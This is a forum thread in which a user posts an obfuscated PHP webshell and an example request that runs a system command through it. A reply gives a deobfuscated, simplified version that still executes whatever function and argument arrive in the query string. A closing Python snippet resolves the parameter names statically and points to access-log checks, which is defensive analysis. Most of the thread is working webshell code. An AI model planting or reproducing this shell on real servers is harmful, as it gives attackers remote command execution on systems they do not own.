• [CHALLENGE/HELP] [PHP] Obfuscated webshell

 #495333  by silver_exploit
 07 Nov 2019, 12:24
Hi,
This is my first post, so I'm not very sure whether it belongs here.
The thing is, some obfuscated PHP code has come into my hands (to be clear, I know nothing at all about PHP). After a while of investigating I saw that I could execute commands:
Code:
http://localhost/shell.php?xvwxvw=system&4=echo%20%22foyone%20presidente%22

But I find it impossible to deobfuscate this code; let's see if someone can help me:
Code:
<?php
$_=[];
[email protected]"$_";
$__=!'';
[email protected]"$__";
[email protected]$_[''];
$____=$__;
++$____;
++$____;
$____=$_[$____];
$_=$__;
++$_;
++$_;
++$_;
++$_;
++$_;
[email protected]"$_";
$_____=$____^$__;
$______=$____^$_;
$_______=$___^$__;
$________=$___^$_;
$_________=$__;
--$_________;
[email protected]"$_________";
$__________=$__;
++$__________;
++$__________;
++$__________;
[email protected]"$__________";
$___________=$___;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
$____________=$______;
++$____________;
$_____________=$____;
++$_____________;
$______________=$____;
++$______________;
++$______________;
$_______________=$____;
++$_______________;
$💩=s.h.e.l.l;
++$_______________;
++$______________;
$________________=$____;
++$________________;
++$________________;
++$________________;
++$________________;
$_________________=$____;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
$__________________=$_______;
++$__________________;
++$__________________;
++$__________________;
[email protected][email protected][email protected][email protected][email protected]$__________.''[email protected][email protected][email protected][email protected][email protected][email protected]$________________;
[email protected][email protected][email protected][email protected][email protected][email protected][email protected]$_________;
$_=N.o.n.S.t.o.P;
$______________=base64_decode($____________________);
// base64_decode was added by me; it had an error before, and before it was also many "_"
$___________________=$______;
$____________________=$___________;
$_=A.r.r.a.w.t.s.u;
$_______=$___.$______.$_________________;
$__=!""*73+25-72-$_GET[$_________________];
[email protected]"$__";
[email protected]$_[''];
$____=$__;
++$____;
++$____;
$____=$_[$____];
$_=$__;
++$_;
++$_;
++$_;
++$_;
++$_;
[email protected]"$_";
$_____=$____^$__;
$______=$____^$_;
$_______=$___^$__;
$________=$___^$_;
$_________=$__;
--$_________;
[email protected]"$_________";
$__________=$____;
++$__________;
++$__________;
++$__________;
++$__________;
$___________=$_______;
++$___________;
++$___________;
$____________=$_______;
++$____________;
++$____________;
++$____________;
$_____________=$_______;
++$_____________;
++$_____________;
++$_____________;
++$_____________;
$______________=$_______;
++$______________;
++$______________;
++$______________;
++$______________;
++$______________;
$_______________=$_______;
++$_______________;
++$_______________;
++$_______________;
++$_______________;
++$_______________;
++$_______________;
[email protected][email protected][email protected][email protected][email protected]$_______________;
[email protected][email protected][email protected][email protected][email protected]$_____________;
//$_________________=$________________($_________________);
$_GET[$_________________]($_GET[$__________]);
$__________=$_________________=$___;

?>
 #495337  by Scorpio
 08 Nov 2019, 04:33
Too much junk; even so, here it is "deobfuscated" and simplified:
Code:
<?php
 $FunctionSeed = 'Arrawtsu';
 $MagicNumber  = '26';
 $XorValue    = $FunctionSeed[0] ^ $MagicNumber;

 echo '$FunctionSeed  = '.$FunctionSeed.PHP_EOL;
 echo '$MagicNumber    = '.$MagicNumber.PHP_EOL;
 echo '$XorValue      = '.$XorValue.PHP_EOL;

 $Char1=$XorValue;
 ++$Char1;
 ++$Char1;
 ++$Char1;
 echo '$Char1          = '.$Char1.PHP_EOL;

 $Char2=$XorValue;
 ++$Char2;
 ++$Char2;
 ++$Char2;
 ++$Char2;
 echo '$Char2          = '.$Char2.PHP_EOL;

 $Char3 = $XorValue;
 ++$Char3;
 ++$Char3;
 ++$Char3;
 ++$Char3;
 ++$Char3;
 echo '$Char3          = '.$Char3.PHP_EOL;

 $CalledFunction=$Char3.$Char1.$Char2.$Char3.$Char1.$Char2;
 echo '$CalledFunction = '.$CalledFunction.PHP_EOL;

 $CalledString=0;
 ++$CalledString;
 ++$CalledString;
 ++$CalledString;
 ++$CalledString;
 echo '$CalledString  = '.$CalledString.PHP_EOL;
 
 $_GET[$CalledFunction]($_GET[$CalledString]);
?>

//Regards.
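The arithmetic in the simplified version above can be checked without executing any PHP. The following is an added example, not part of either post: it emulates PHP's string `^` and string `++` in Python to resolve the two request parameter names statically. The helper names `php_xor`, `php_inc`, `bump` and `resolve` are hypothetical.

```python
# Added example: static resolution of the names built by the simplified shell.
# Helper names are hypothetical; only the seed and magic value come from the thread.

def php_xor(a: str, b: str) -> str:
    """PHP `^` on two strings: byte-wise XOR, truncated to the shorter operand."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))

def php_inc(s: str) -> str:
    """PHP `++` on a non-numeric alphanumeric string (Perl-style, with carry)."""
    if not s:
        return "1"                      # PHP turns "" into "1"
    out, i = list(s), len(s) - 1
    while i >= 0:
        c = out[i]
        wrap = {"z": "a", "Z": "A", "9": "0"}.get(c)
        if wrap is None:
            if c.isascii() and c.isalnum():
                out[i] = chr(ord(c) + 1)
            return "".join(out)         # no carry left (or non-alphanumeric byte)
        out[i] = wrap                   # wrapped around, carry to the left
        i -= 1
    # Every position wrapped: prepend a character of the leading class.
    lead = {"a": "a", "A": "A", "0": "1"}[out[0]]
    return lead + "".join(out)

def bump(s: str, n: int) -> str:
    """Apply `++` n times, as the repeated `++$var;` lines do."""
    for _ in range(n):
        s = php_inc(s)
    return s

def resolve(seed: str = "Arrawtsu", magic: str = "26"):
    """Return (function_param, argument_param) as the simplified code derives them."""
    base = php_xor(seed[0], magic)      # 'A' ^ '2' -> 's' (only one byte survives)
    c1, c2, c3 = bump(base, 3), bump(base, 4), bump(base, 5)
    func_param = c3 + c1 + c2 + c3 + c1 + c2
    arg_param = 0
    for _ in range(4):                  # integer counter, four `++` statements
        arg_param += 1
    return func_param, arg_param

if __name__ == "__main__":
    print(resolve())
```

The resolved names match the query string in the first post (`xvwxvw=...&4=...`), so these are the parameter names to search for in web server access logs when checking whether the file was used.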